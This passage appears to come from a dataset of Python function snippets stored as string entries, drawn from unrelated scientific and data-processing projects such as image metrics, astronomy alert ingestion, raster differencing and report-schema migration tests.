deb_img)\n sum_ssim += structural_similarity(orig_img, deb_img, multichannel=True)\n\n count += 1\n print('Analyzed: {}/{}'.format(count, len(files_orig)))\n\n # Average\n avg_psnr = sum_psnr/len(files_orig)\n avg_mse = sum_mse/len(files_orig)\n avg_ssim = sum_ssim/len(files_orig)\n\n return avg_mse, avg_psnr, avg_ssim", "def check_error(self):\n refine_results = {}\n for phase_path, phase in self.phases.items():\n refine_results[phase_path] = {}\n\n # Save the original grid to the refine results\n tx = phase.options['transcription']\n gd = tx.grid_data\n num_nodes = gd.subset_num_nodes['all']\n numseg = gd.num_segments\n\n refine_results[phase_path]['num_segments'] = numseg\n refine_results[phase_path]['order'] = gd.transcription_order\n refine_results[phase_path]['segment_ends'] = gd.segment_ends\n refine_results[phase_path]['need_refinement'] = np.zeros(numseg, dtype=bool)\n refine_results[phase_path]['error'] = np.zeros(numseg, dtype=float)\n\n if isinstance(tx, dm.RungeKutta):\n continue\n\n outputs = phase.list_outputs(units=False, out_stream=None)\n\n out_values_dict = {k: v['value'] for k, v in outputs}\n\n prom_to_abs_map = phase._var_allprocs_prom2abs_list['output']\n\n num_scalar_states = 0\n for state_name, options in phase.state_options.items():\n shape = options['shape']\n size = np.prod(shape)\n num_scalar_states += size\n\n x = np.zeros([num_nodes, num_scalar_states])\n f = np.zeros([num_nodes, num_scalar_states])\n c = 0\n\n # Obtain the solution on the current grid\n for state_name, options in phase.state_options.items():\n prom_name = f'timeseries.states:{state_name}'\n abs_name = prom_to_abs_map[prom_name][0]\n rate_source_prom_name = f\"timeseries.state_rates:{state_name}\"\n rate_abs_name = prom_to_abs_map[rate_source_prom_name][0]\n x[:, c] = out_values_dict[prom_name].ravel()\n f[:, c] = out_values_dict[rate_source_prom_name].ravel()\n c += 1\n\n # Obtain the solution on the new grid\n # interpolate x at t_hat\n new_order = gd.transcription_order + 1\n # Gauss-Lobatto does not allow even orders so increase order by 2 instead\n if gd.transcription == 'gauss-lobatto':\n new_order += 1\n new_grid = GridData(numseg, gd.transcription, new_order, gd.segment_ends, gd.compressed)\n left_end_idxs = new_grid.subset_node_indices['segment_ends'][0::2]\n left_end_idxs = np.append(left_end_idxs, new_grid.subset_num_nodes['all'] - 1)\n\n L = interpolation_lagrange_matrix(gd, new_grid)\n I = integration_matrix(new_grid)\n\n # Call the ODE at all nodes of the new grid\n x_hat, x_prime = self.eval_ode(phase, new_grid, L, I)\n E = {}\n e = {}\n err_over_states = {}\n for state_name, options in phase.state_options.items():\n E[state_name] = np.absolute(x_prime[state_name] - x_hat[state_name])\n for k in range(0, numseg):\n e[state_name] = E[state_name]/(1 + np.max(x_hat[state_name][left_end_idxs[k]:left_end_idxs[k + 1]]))\n err_over_states[state_name] = np.zeros(numseg)\n\n for state_name, options in phase.state_options.items():\n for k in range(0, numseg):\n err_over_states[state_name][k] = np.max(e[state_name][left_end_idxs[k]:left_end_idxs[k + 1]])\n\n self.error[phase_path] = np.zeros(numseg)\n refine_results[phase_path]['error'] = np.zeros(numseg)\n refine_results[phase_path]['need_refinement'] = np.zeros(numseg, dtype=bool)\n\n # Assess the errors in each state\n for state_name, options in phase.state_options.items():\n for k in range(0, numseg):\n if err_over_states[state_name][k] > self.error[phase_path][k]:\n self.error[phase_path][k] = err_over_states[state_name][k]\n refine_results[phase_path]['error'][k] = err_over_states[state_name][k]\n if self.error[phase_path][k] > phase.refine_options['tolerance']:\n refine_results[phase_path]['need_refinement'][k] = True\n\n return refine_results", "def errdump_analysis(errdump_df, switchshow_df, switch_params_aggregated_df, \n portshow_aggregated_df, project_constants_lst):\n \n # imported project constants required for module execution\n project_steps_df, max_title, io_data_names_df, _, report_headers_df, report_columns_usage_sr, *_ = project_constants_lst\n\n # data titles obtained after module execution (output data)\n # data titles which module is dependent on (input data)\n data_names, analyzed_data_names = dfop.list_from_dataframe(io_data_names_df, 'errorlog_analysis_out', 'errorlog_analysis_in')\n # module information\n meop.show_module_info(project_steps_df, data_names)\n # read data from database if they were saved on previos program execution iteration\n data_lst = dbop.read_database(project_constants_lst, *data_names)\n \n # force run when any output data from data_lst is not found in database or \n # procedure execution explicitly requested (force_run flag is on) for any output or input data \n force_run = meop.verify_force_run(data_names, data_lst, project_steps_df, \n max_title, analyzed_data_names)\n if force_run:\n # data imported from init file (regular expression patterns) to extract values from data columns\n pattern_dct, _ = sfop.regex_pattern_import('raslog_split', max_title)\n raslog_message_details_df = sfop.dataframe_import('raslog_details', max_title)\n raslog_message_id_details_df = sfop.dataframe_import('raslog_id_details', max_title, columns=['Message_ID', 'Details', 'Recommended_action'])\n\n # current operation information string\n info = f'Counting RASLog messages'\n print(info, end =\" \")\n\n # get aggregated DataFrames\n errdump_aggregated_df = errdump_aggregated(errdump_df, switchshow_df, switch_params_aggregated_df, \n portshow_aggregated_df, pattern_dct)\n # count how many times event appears during one month for the last six months \n raslog_counter_df, raslog_frequent_df = errdump_statistics(errdump_aggregated_df, raslog_message_details_df, raslog_message_id_details_df)\n # after finish display status\n meop.status_info('ok', max_title, len(info)) \n # partition aggregated DataFrame to required tables\n raslog_report_df = raslog_report(raslog_frequent_df, data_names, report_headers_df, report_columns_usage_sr)\n\n # create list with partitioned DataFrames\n data_lst = [errdump_aggregated_df, raslog_counter_df, raslog_report_df]\n # writing data to sql\n dbop.write_database(project_constants_lst, data_names, *data_lst)\n # verify if loaded data is empty and replace information string with empty DataFrame\n else:\n data_lst = dbop.verify_read_data(max_title, data_names, *data_lst)\n errdump_aggregated_df, raslog_counter_df, *_ = data_lst\n # save data to service file if it's required\n for data_name, data_frame in zip(data_names, data_lst):\n report.dataframe_to_excel(data_frame, data_name, project_constants_lst)\n return errdump_aggregated_df, raslog_counter_df", "def __getHoldingsTransferred(self, dirPath=None):\n trsfD = {}\n insD = {}\n dirPath = dirPath if dirPath else self.__sandboxPath\n\n try:\n fp = os.path.join(dirPath, \"status\", \"theoretical_model_obsolete.tsv\")\n lineL = self.__mU.doImport(fp, \"list\") # pylint: disable=no-member\n #\n obsDateD = {}\n obsIdD = {}\n for line in lineL:\n fields = line.split(\"\\t\")\n if len(fields) < 3:\n continue\n entryId = str(fields[0]).strip().upper()\n obsDateD[entryId] = dateutil.parser.parse(fields[2]) if self.__assignDates else fields[2]\n if len(fields) > 3 and len(fields[3]) > 3:\n obsIdD[entryId] = str(fields[3]).strip().upper()\n logger.debug(\"Read %d obsolete insilico id codes\", len(obsDateD))\n # --------- --------- --------- --------- --------- --------- ---------\n fp = os.path.join(dirPath, \"status\", \"model-archive-PDB-insilico-mapping.list\")\n lineL = self.__mU.doImport(fp, \"list\")\n #\n trD = {}\n for line in lineL:\n fields = line.split(\":\")\n if len(fields) < 2:\n continue\n entryId = str(fields[1]).strip().upper()[:4]\n maId = str(fields[0]).strip()\n trD[entryId] = maId\n logger.debug(\"Read %d model archive id codes\", len(trD))\n #\n # --------- --------- --------- --------- --------- --------- ---------\n fp = os.path.join(dirPath, \"status\", \"theoretical_model_v2.tsv\")\n lineL = self.__mU.doImport(fp, \"list\")\n #\n logger.debug(\"Read %d insilico id codes\", len(lineL))\n for line in lineL:\n fields = str(line).split(\"\\t\")\n if len(fields) < 6:\n continue\n depDate = dateutil.parser.parse(fields[2]) if self.__assignDates else fields[2]\n relDate = None\n if len(fields[3]) >= 10 and not fields[3].startswith(\"0000\"):\n relDate = dateutil.parser.parse(fields[3]) if self.__assignDates else fields[3]\n\n statusCode = \"TRSF\" if fields[1] == \"REL\" else fields[1]\n\n entryId = str(fields[0]).upper()\n title = fields[4]\n #\n auditAuthors = [t.strip() for t in fields[5].split(\";\")]\n repId = None\n repName = None\n if entryId in trD:\n repName = \"Model Archive\"\n repId = trD[entryId]\n\n #\n dD = {\n \"status_code\": statusCode,\n \"deposit_date\": depDate,\n \"repository_content_types\": [\"coordinates\"],\n \"title\": title,\n \"audit_authors\": auditAuthors,\n }\n #\n if relDate:\n dD[\"release_date\"] = relDate\n #\n if repId:\n dD[\"remote_accession_code\"] = repId\n dD[\"remote_repository_name\"] = repName\n if statusCode == \"TRSF\":\n trsfD[entryId] = dD\n #\n #\n dD = {\"status_code\": statusCode, \"deposit_date\": depDate, \"title\": title, \"audit_authors\": auditAuthors}\n #\n if relDate:\n dD[\"release_date\"] = relDate\n #\n if entryId in obsDateD:\n dD[\"remove_date\"] = relDate\n #\n if entryId in obsIdD:\n dD[\"id_codes_replaced_by\"] = [obsIdD[entryId]]\n #\n insD[entryId] = dD\n #\n logger.info(\"Transferred entries %d - insilico models %d\", len(trsfD), len(insD))\n #\n except Exception as e:\n logger.exception(\"Failing with %s\", str(e))\n\n return trsfD, insD", "def main_pipeline(self, image):\n # detection\n t0 = datetime.now()\n bbox_list, score_list, label_list = self.det.inference(image)\n t1 = datetime.now()\n logging.info('main pipeline (det): {}'.format(get_tdiff(t0, t1)))\n \n # estimation\n t0 = datetime.now()\n disp = self.est.inference(image)\n depth_list = self.est.calc_depth(bbox_list)\n t1 = datetime.now()\n logging.info('main pipeline (est): {}'.format(get_tdiff(t0, t1)))\n \n # tracker predict\n t0 = datetime.now()\n for t in self.t_list:\n t.predict()\n t1 = datetime.now()\n logging.info('main pipeline (trk_pred): {}'.format(get_tdiff(t0, t1)))\n \n # associate\n t0 = datetime.now()\n matched_pair, unmatched_bbox_list, _ = associate(bbox_list, label_list, self.t_list)\n t1 = datetime.now()\n logging.info('main pipeline (da_solver): {}'.format(get_tdiff(t0, t1)))\n \n t0 = datetime.now()\n # update trackers for matched_pair\n for m in matched_pair:\n t = self.t_list[m[1]]\n bbox = bbox_list[m[0]]\n depth = depth_list[m[0]]\n est_dict = {\n 'label': label_list[m[0]],\n 'score': score_list[m[0]]}\n t.update(self.frame_idx, bbox, depth, est_dict)\n \n # update in-track status of all trackers\n for t in self.t_list:\n t.update_status(self.frame_idx)\n \n # purge out dead trackers\n self.t_list = [t for t in self.t_list if t.get_status()]\n\n # create new trackers for unmatched_bbox_list\n for b_idx in unmatched_bbox_list:\n bbox = bbox_list[b_idx]\n depth = depth_list[b_idx]\n est_dict = {\n 'label': label_list[b_idx],\n 'score': score_list[b_idx]}\n self.t_list.append(tracker(self.t_cfg, self.tid_new, bbox, depth, est_dict))\n self.tid_new += 1\n\n t1 = datetime.now()\n logging.info('main pipeline (trk_upd): {}'.format(get_tdiff(t0, t1)))\n\n # disparity map for display\n return disp", "def read_inversion_info(file_dic):\n #print_file_test = open('file_test.txt','w')\n\n if not ( check_inversion_files(file_dic) ):\n print 'error(read_inversion_info): problem with lenstool file names'\n return 0\n \n file_generate_arcs = file_dic['file_generate_arcs']\n info_input_lens = fc.extract_second_identifiers( file_generate_arcs, \\\n 'potential' )\n#-------------------------------------------------------------------------------\n\n file_source = file_dic['file_source']\n info_src = np.loadtxt(file_source, unpack=False)\n if len(info_src) == 8 and np.isscalar(info_src[0]):\n #FIXME - check if the second condition is all we need\n info_src = [info_src]\n#-------------------------------------------------------------------------------\n\n file_make_inversion = file_dic['file_make_inversion']\n info_fited_param = fc.extract_second_identifiers( file_make_inversion, \\\n 'limit' )\n info_forme = fc.extract_parameter(file_make_inversion, 'forme')[0][0]\n\n#-------------------------------------------------------------------------------\n\n file_best_fit = file_dic['file_best_fit']\n info_best_fit = fc.extract_second_identifiers( file_best_fit, \\\n 'potentiel' )\n\n info_xi2 = fc.extract_parameter(file_best_fit, '#Chi2pos:')\n\n#-------------------------------------------------------------------------------\n file_chires = file_dic['file_chires']\n\n info_chires = extract_parameter(file_chires, '0')\n rmss_mean = [0.0, 0.0]\n rmsi_mean = [0.0, 0.0]\n for i in info_chires:\n if i[0] != 'A':\n rmss_mean[0] = rmss_mean[0] + float(i[7])\n rmss_mean[1] = rmss_mean[1] + 1.0\n \n rmsi_mean[0] = rmsi_mean[0] + float(i[8])\n rmsi_mean[1] = rmsi_mean[1] + 1.0\n\n rmss_mean = rmss_mean[0]/rmss_mean[1]\n rmsi_mean = rmsi_mean[0]/rmsi_mean[1]\n#-------------------------------------------------------------------------------\n out_dict = { 'xi2' : float(info_xi2[0][0]), \\\n 'best_fit_lens' : info_best_fit, \\\n 'rmsi_mean' : rmsi_mean, \\\n 'rmss_mean' : rmss_mean, \\\n 'fited_parameters' : info_fited_param[0].keys(), \\\n 'input_lens' : info_input_lens[len(info_input_lens) - 1], \\\n 'forme' : info_forme \\\n }\n #for i in out_dict.keys():\n # print i, out_dict[i]\n return out_dict", "def compute_differences(pts_important, jparams):\n print(\"=== Computing differences ===\")\n start = time.time()\n print(\"start measuring time of compute_differences\")\n input_data = rasterio.open(jparams[\"input-file\"])\n out_profile = input_data.profile\n out_profile['dtype'] = 'float32'\n raw_data = input_data.read()\n PixelSizeX = input_data.transform[0]\n PixelSizeY = -input_data.transform[4]\n ###\n nodata_value = input_data.nodata\n ncols = input_data.width\n nrows = input_data.height\n shape = input_data.shape\n ###\n raster_pts = np.array(generate_raster_points(nrows, ncols, raw_data, nodata_value, PixelSizeX, PixelSizeY,0))\n ### generate the simplified TIN\n dt_2d = scipy.spatial.Delaunay([i[0:2] for i in pts_important])\n ###now let's compare them\n outlist = []\n linelist = []\n # print(ncols,nrows)\n # print(shape)\n # print(len(raster_pts))\n # print(len(raw_data[0][1]))\n col_counter = 0\n row_counter = 0\n for point in raster_pts:\n if point[2] == nodata_value:\n linelist.append(nodata_value)\n else:\n triangle_idx = dt_2d.find_simplex(point[0:2])\n if triangle_idx == -1:\n print(\"!!! WARNING: point outside convex hull of simplified dataset !!!\")\n linelist.append(nodata_value)\n else:\n interpolation = TIN_interpolator(pts_important, dt_2d, triangle_idx, point)\n linelist.append(point[2] - interpolation)\n #index counters\n col_counter +=1\n if col_counter == ncols:\n col_counter = 0\n outlist.append(linelist)\n linelist = []\n #print(diff_raster)\n #let's write the output file reusing the settings of the input file\n outputter = rasterio.open(jparams[\"output-file-differences\"], 'w', **out_profile)\n outputter.write(np.array([outlist]).astype(rasterio.float32))\n \n end = time.time()\n print(\"compute_differences takes \",end - start)", "def make_diff(file_before, file_after, file_output_name):\n if os.path.exists(file_output_name):\n shutil.rmtree(file_output_name)\n os.mkdir(file_output_name)\n psd_diff = diff(file_before, file_after)\n diff_content = {}\n for attr in [\"header\", \"layer\"]:\n diff_content[attr] = getattr(psd_diff, attr)\n with open(os.path.join(file_output_name, \"diff.json\"), \"w\") as diff_file:\n json.dump(diff_content, diff_file, indent=4)\n saved_files = []\n for layer_id in psd_diff.layer.keys():\n if len(psd_diff.layer_image[layer_id]) > 1:\n output_image = os.path.join(file_output_name, layer_id)\n psd_diff.layer_image[layer_id][\"before\"].save(output_image + \".before.png\")\n psd_diff.layer_image[layer_id][\"after\"].save(output_image + \".after.png\")\n diff_image_before = Image.new(\"RGBA\", psd_diff.layer_image[layer_id][\"before\"].size)\n diff_image_before_data = diff_image_before.load()\n diff_image_after = Image.new(\"RGBA\", psd_diff.layer_image[layer_id][\"after\"].size)\n diff_image_after_data = diff_image_after.load()\n width, height = diff_image_before.size\n pixel_index = 1\n for y in xrange(height):\n for x in xrange(width):\n if str(pixel_index) in diff_content[\"layer\"][layer_id][\"pixel\"]:\n diff_image_before_data[x, y] = tuple(diff_content[\"layer\"][layer_id][\"pixel\"][str(pixel_index)][\"before\"])\n diff_image_after_data[x, y] = tuple(diff_content[\"layer\"][layer_id][\"pixel\"][str(pixel_index)][\"after\"])\n else:\n diff_image_before_data[x, y] = (0, 0, 0, 0)\n diff_image_after_data[x, y] = (0, 0, 0, 0)\n pixel_index += 1\n diff_image_before.save(output_image + \".before.diff.png\", \"PNG\")\n diff_image_after.save(output_image + \".after.diff.png\", \"PNG\")\n saved_files.append(output_image + \".before.png\")\n saved_files.append(output_image + \".before.diff.png\")\n saved_files.append(output_image + \".after.diff.png\")\n saved_files.append(output_image + \".after.png\")\n saved_files.append(file_output_name + \"/diff.json\")\n return saved_files", "def update_22(db, filename_persist, snapshots_dir, snapshots_reference_dir):\n data = {\n # 'fail'\n 'test/test_pyglet_vb.py' : {\n 'st': 'fail', 'diag': 'incomplete grossini rendition at first frame'},\n\n # 'error'\n 'test/test_text_movement.py' : {\n 'st': 'error',\n 'diag': 'position should be set at the node level, not at the element level'},\n\n 'test/test_schedule_interval.py' : {\n 'st':'error', 'diag': 'bad timestamps, repeated snapshots'},\n\n 'test/test_transitions_with_pop_recipe.py' : {\n 'st':'error', 'diag': 'bad timestamps, repeated snapshots'},\n\n 'test/test_SequenceScene.py' : {\n 'st':'error', 'diag': 'bad timestamps, black frame'},\n\n 'test/test_camera_orbit.py' : {\n 'st':'error', 'diag': 'alternate snapshots are pure black'},\n\n 'test/test_jumptiles3d.py' : {\n 'st':'error', 'diag': \"snpshots don't folow changes in scene\"},\n\n 'test/test_transition_zoom.py' : {\n 'st':'error', 'diag': 'bad timestamps, repeated snapshots'},\n }\n\n ren_key = {'st':'testrun_success', 'diag':'testrun_diagnostic'}\n testrun_props_by_candidate = {}\n for name in data:\n testrun_props_by_candidate[name] = dict([(ren_key[k], data[name][k]) for k in data[name]])\n \n hl.update_testrun__bad(db, filename_persist, testrun_props_by_candidate,\n snapshots_dir, snapshots_reference_dir)", "def update_alerts(self, source_path):\n\n read = 0\n added = 0\n errored = 0\n now = Time.now().iso\n\n alerts_insert = '''\n INSERT INTO alerts VALUES (\n :nightid,last_insert_rowid(),:jd,:fid,:pid,:diffmaglim,\n :pdiffimfilename,:programpi,:programid,:candid,\n :isdiffpos,:tblid,:nid,:rcid,:field,:xpos,:ypos,\n :ra,:dec,:magpsf,:sigmapsf,:chipsf,:magap,\n :sigmagap,:distnr,:magnr,:sigmagnr,:chinr,\n :sharpnr,:sky,:magdiff,:fwhm,:classtar,\n :mindtoedge,:magfromlim,:seeratio,:aimage,:bimage,\n :aimagerat,:bimagerat,:elong,:nneg,:nbad,:rb,\n :ssdistnr,:ssmagnr,:ssnamenr,:sumrat,:magapbig,\n :sigmagapbig,:ranr,:decnr,:sgmag1,:srmag1,:simag1,\n :szmag1,:sgscore1,:distpsnr1,:ndethist,:ncovhist,\n :jdstarthist,:jdendhist,:scorr,:tooflag,\n :objectidps1,:objectidps2,:sgmag2,:srmag2,:simag2,\n :szmag2,:sgscore2,:distpsnr2,:objectidps3,\n :sgmag3,:srmag3,:simag3,:szmag3,:sgscore3,\n :distpsnr3,:nmtchps,:rfid,:jdstartref,:jdendref,\n :nframesref,:exptime)\n '''\n\n tri = ProgressTriangle(1, self.logger, base=10)\n for path, dirs, files in os.walk(source_path):\n for f in files:\n if not f.endswith('avro'):\n continue\n\n read += 1\n tri.update()\n alert = util.avro2dict(os.path.join(path, f))\n try:\n candidate = alert['candidate']\n except TypeError:\n continue\n\n night = Time(candidate['jd'], format='jd').iso[:10]\n\n # exptime does not exist in older alerts\n jd0 = candidate['jd']\n jd1 = jd0 + candidate.get('exptime', 0)\n candidate['exptime'] = candidate.get('exptime')\n\n try:\n c = self.db.cursor()\n c.execute('''\n INSERT OR IGNORE INTO nights\n VALUES (NULL,:date,0,:now)\n ''', dict(date=night, now=now))\n\n candidate['nightid'] = c.execute('''\n SELECT nightid FROM nights\n WHERE date=:date\n ''', dict(date=night)).fetchone()[0]\n\n ra = np.radians(candidate['ra'])\n dec = np.radians(candidate['dec'])\n points = util.define_points(ra, dec, HALF_SIZE)\n rows = [[None, 'alerts', jd0, jd1, points]]\n self.db.add_observations(\n rows, other_cmd=alerts_insert,\n other_rows=[candidate])\n except sqlite3.IntegrityError:\n errored += 1\n continue\n\n c.execute('''\n UPDATE nights SET alerts=alerts+1 WHERE date=:date\n ''', dict(date=night))\n \n added += 1\n\n self.logger.info('{} files read, {} added to database.'\n .format(read, added))\n self.logger.warning('{} errored transactions.'.format(errored))", "def create_dicts_w_info(df,\n table_visit_diff_string,\n bad_records_string='num_bad_records'):\n\n hpos = df['src_hpo_id'].unique().tolist()\n\n site_dictionaries = {}\n\n for hpo in hpos:\n sample_df = df.loc[df['src_hpo_id'] == hpo]\n\n sample_df.loc[\"Total\"] = sample_df.sum(numeric_only=True)\n\n hpo_dict = sample_df.loc[\"Total\"].to_dict()\n\n site_dictionaries[hpo] = hpo_dict\n\n tot = 0\n\n num_bad_records = {}\n\n for hpo, info in site_dictionaries.items():\n num_bad_records[hpo] = info[bad_records_string]\n\n table_visit_diff_dict = {}\n tot_rec, tot_diff = 0, 0\n\n for hpo, info in site_dictionaries.items():\n bad_records = info[bad_records_string]\n difference = info[table_visit_diff_string]\n\n tot_rec += bad_records\n tot_diff += difference\n\n avg = round(difference / bad_records, 2)\n\n table_visit_diff_dict[hpo] = avg\n\n table_visit_diff_dict['Total'] = round(tot_diff / tot_rec, 2)\n\n return num_bad_records, table_visit_diff_dict", "def calculate_diagnostics(self):\n\n # create dictionary of lists of compartment values\n self.population_soln = {}\n for label in self.labels:\n if label in self.population_soln:\n continue\n self.population_soln[label] = self.get_compartment_soln(label)\n\n # used as flag to build var_array after self.calculate_vars\n # has been run\n self.var_labels = None\n\n n_time = len(self.times)\n for i in range(n_time):\n\n self.time = self.times[i]\n\n for label in self.labels:\n self.compartments[label] = self.population_soln[label][i]\n\n self.calculate_vars()\n self.calculate_flows()\n self.calculate_diagnostic_vars()\n\n # only set after self.calculate_diagnostic_vars has been run so that we have all var_labels,\n # including the ones in calculate_diagnostic_vars\n if self.var_labels is None:\n self.var_labels = list(self.vars.keys())\n self.var_array = numpy.zeros((n_time, len(self.var_labels)))\n self.flow_array = numpy.zeros((n_time, len(self.labels)))\n\n for i_label, label in enumerate(self.var_labels):\n self.var_array[i, i_label] = self.vars[label]\n for i_label, label in enumerate(self.labels):\n self.flow_array[i, i_label] = self.flows[label]\n\n # calculate compartment sizes as fractions of population\n self.fraction_soln = {}\n for label in self.labels:\n self.fraction_soln[label] = [\n old_div(v,\n t) for v,\n t in zip(\n self.population_soln[label],\n self.get_var_soln('population'))\n ]", "def test_migrate_interpretation_request_rd(self):\n old_instance = GenericFactoryAvro.get_factory_avro(\n self.old_model.InterpretationRequestRD, VERSION_300, fill_nullables=False\n ).create() # reports_3_0_0.InterpretationRequestRD\n self._validate(old_instance)\n migrated_instance = MigrateReports3To4().migrate_interpretation_request_rd(old_instance=old_instance)\n self._validate(migrated_instance)\n\n old_big_wigs = old_instance.bigWigs\n new_big_wigs = migrated_instance.bigWigs\n\n if old_big_wigs is not None:\n for old_big_wig, new_big_wig in zip(old_big_wigs, new_big_wigs):\n self.assertIsInstance(new_big_wig, self.new_model.File)\n self.assertEqual(new_big_wig.sampleId, old_big_wig.SampleId)\n self.assertEqual(new_big_wig.uriFile, old_big_wig.URIFile)\n self.assertEqual(new_big_wig.fileType, old_big_wig.fileType)\n self.assertEqual(new_big_wig.md5Sum, None)\n\n old_instance = GenericFactoryAvro.get_factory_avro(\n self.old_model.InterpretationRequestRD, VERSION_300, fill_nullables=True\n ).create() # reports_3_0_0.InterpretationRequestRD\n self._validate(old_instance)\n migrated_instance = MigrateReports3To4().migrate_interpretation_request_rd(old_instance=old_instance)\n\n for old_variant, new_variant in zip(old_instance.TieredVariants, migrated_instance.tieredVariants):\n for old_re, new_re in zip(old_variant.reportEvents, new_variant.reportEvents):\n self.assertEqual(old_re.genomicFeature.HGNC, new_re.genomicFeature.hgnc)\n\n self._validate(migrated_instance)", "def calc_orig(self):\n measure = self.measure\n # Calculate work for all possible matching pairs from sim and obs\n aw = np.full(shape=(len(self.q_obs), len(self.q_sim)), fill_value=np.nan)\n # iterate through all flow observations\n for i_o in range(len(self.q_obs)):\n # Check only simulations within the allowed window\n for i_s in range(max(0, i_o - self.max_lead),\n min(len(self.q_sim), i_o + self.max_lag + 1)):\n if measure in ('nse', 'square'):\n aw[i_s, i_o] = (self.q_sim[i_s] - self.q_obs[i_o]) ** 2 + self.b ** 2 * (i_s - i_o) ** 2\n elif measure in ('mae', 'abs'):\n aw[i_s, i_o] = np.abs(self.q_sim[i_s] - self.q_obs[i_o]) + self.b * np.abs(i_s - i_o)\n\n # Calculate cumulative work along possible paths\n cw = np.ones(shape=aw.shape + (2,)) * np.nan\n # Populate first column\n cw[:, 0, 0] = aw[:, 0]\n\n if self.keep_internals:\n self.aw = aw\n self.cw = cw\n\n # Populate other columns\n # Filter out warning to suppress warnings from numpy when np.nanmin\n # encounters all NaN slices\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n for i_o in range(1, aw.shape[1]):\n for i_s in range(max(0, i_o - self.max_lead),\n min(aw.shape[1], i_o + self.max_lag + 1)):\n # e = aw[i_s, i_o]\n if measure in ('nse', 'square'):\n e = (self.q_sim[i_s] - self.q_obs[i_o]) ** 2 + self.b ** 2 * (i_s - i_o) ** 2\n elif measure in ('mae', 'abs'):\n e = np.abs(self.q_sim[i_s] - self.q_obs[i_o]) + self.b * np.abs(i_s - i_o)\n\n # Repeat the same simulation point\n cw[i_s, i_o, 1] = e + cw[i_s, i_o - 1, 0]\n\n if i_s > 0:\n m1 = np.nanmin(cw[i_s - 1, i_o - 1, :])\n if i_s > 1:\n # Skip a sim point\n m2 = np.nanmin(cw[i_s - 2, i_o - 1, :])\n else:\n m2 = np.inf\n m = min(m1, m2)\n cw[i_s, i_o, 0] = e + m\n self.opt_score = np.nanmin(cw[:, -1, :])\n self.of = 1 - self.opt_score / self.fbench\n\n if self.calc_rays:\n # self._do_calc_rays(cw[:, :, 0], cw[:, :, 1])\n s, e = 0, None\n for i_o in range(len(self.q_obs))[::-1]:\n # print('')\n # print(i_o, s, e)\n # print(cw[s:e, i_o, 0])\n m = np.nanargmin(cw[s:e, i_o, 0]) + s\n try:\n m_rep = np.nanargmin(cw[s:e, i_o, 1]) + s\n except ValueError:\n pass\n else:\n if cw[m_rep, i_o, 1] <= cw[m, i_o, 0]:\n m = m_rep\n self.tau[i_o] = i_o - m\n self.res[i_o] = self.q_obs[i_o] - self.q_sim[m]\n self.rays[i_o] = [(i_o, self.q_obs[i_o]), (m, self.q_sim[m])]\n # print(i_o, s, e, m)\n s, e = max(0, m - 2), m + 1\n\n return self.of", "def interpolate_loss_calculation(self, interpolates):\n _, fake_scores = self.D(interpolates)\n return fake_scores", "def calculate_flowamount_diff_between_dfs(dfa_load, dfb_load):\n\n # subset the dataframes, only keeping data for easy\n # comparison of flowamounts\n drop_cols = ['Year', 'MeasureofSpread', 'Spread', 'DistributionType',\n 'Min', 'Max', 'DataReliability', 'DataCollection']\n # drop cols and rename, ignore error if a df does not\n # contain a column to drop\n dfa = dfa_load.drop(drop_cols, axis=1, errors='ignore'\n ).rename(columns={'FlowAmount': 'FlowAmount_Original'})\n dfb = dfb_load.drop(drop_cols, axis=1, errors='ignore'\n ).rename(columns={'FlowAmount': 'FlowAmount_Modified'})\n # create df dict for modified dfs created in for loop\n df_list = []\n for d in ['a', 'b']:\n df_name = f'df{d}'\n # assign new column of geoscale by which to aggregate\n vars()[df_name+'2'] = vars()[df_name].assign(\n geoscale=np.where(vars()[df_name]['Location'].\n apply(lambda x: x.endswith('000')),\n 'state', 'county'))\n vars()[df_name+'2'] = vars()[df_name+'2'].assign(\n geoscale=np.where(vars()[df_name+'2']['Location'] == '00000',\n 'national', vars()[df_name+'2']['geoscale']))\n # ensure all nan/nones filled/match\n vars()[df_name + '2'] = \\\n replace_strings_with_NoneType(vars()[df_name+'2'])\n df_list.append(vars()[df_name+'2'])\n # merge the two dataframes\n for df in df_list:\n replace_NoneType_with_empty_cells(df)\n df = df_list[0].merge(df_list[1], how='outer')\n\n # determine if any new data is negative\n dfn = df[df['FlowAmount_Modified'] < 0].reset_index(drop=True)\n if len(dfn) > 0:\n vLog.info('There are negative FlowAmounts in new dataframe, '\n 'see Validation Log')\n vLogDetailed.info('Negative FlowAmounts in new dataframe: '\n '\\n {}'.format(dfn.to_string()))\n\n # Because code will sometimes change terminology, aggregate\n # data by context and flowable to compare df differences\n # subset df\n dfs = df[['Flowable', 'Context', 'ActivityProducedBy',\n 'ActivityConsumedBy', 'FlowAmount_Original',\n 'FlowAmount_Modified', 'Unit', 'geoscale']]\n agg_cols = ['Flowable', 'Context', 'ActivityProducedBy',\n 'ActivityConsumedBy', 'Unit', 'geoscale']\n dfagg = dfs.groupby(\n agg_cols, dropna=False, as_index=False).agg(\n {'FlowAmount_Original': sum, 'FlowAmount_Modified': sum})\n # column calculating difference\n dfagg['FlowAmount_Difference'] = \\\n dfagg['FlowAmount_Modified'] - dfagg['FlowAmount_Original']\n dfagg['Percent_Difference'] = (dfagg['FlowAmount_Difference'] /\n dfagg['FlowAmount_Original']) * 100\n # drop rows where difference = 0\n dfagg2 = dfagg[dfagg['FlowAmount_Difference'] != 0].reset_index(drop=True)\n if len(dfagg2) == 0:\n vLogDetailed.info('No FlowAmount differences')\n else:\n # subset df and aggregate, also print out the total\n # aggregate diff at the geoscale\n dfagg3 = replace_strings_with_NoneType(dfagg).drop(\n columns=['ActivityProducedBy', 'ActivityConsumedBy',\n 'FlowAmount_Difference', 'Percent_Difference'])\n dfagg4 = dfagg3.groupby(\n ['Flowable', 'Context', 'Unit', 'geoscale'],\n dropna=False, as_index=False).agg(\n {'FlowAmount_Original': sum, 'FlowAmount_Modified': sum})\n # column calculating difference\n dfagg4['FlowAmount_Difference'] = \\\n dfagg4['FlowAmount_Modified'] - dfagg4['FlowAmount_Original']\n dfagg4['Percent_Difference'] = (dfagg4['FlowAmount_Difference'] /\n dfagg4['FlowAmount_Original']) * 100\n # drop rows where difference = 0\n dfagg5 = dfagg4[\n dfagg4['FlowAmount_Difference'] != 0].reset_index(drop=True)\n vLogDetailed.info('Total FlowAmount differences between dataframes: '\n '\\n {}'.format(dfagg5.to_string(), index=False))\n\n # save detail output in log file\n vLogDetailed.info('Total FlowAmount differences by Activity Columns: '\n '\\n {}'.format(dfagg2.to_string(), index=False))", "def test_review_status_update_from_source_trim(self):\n test_project_path = 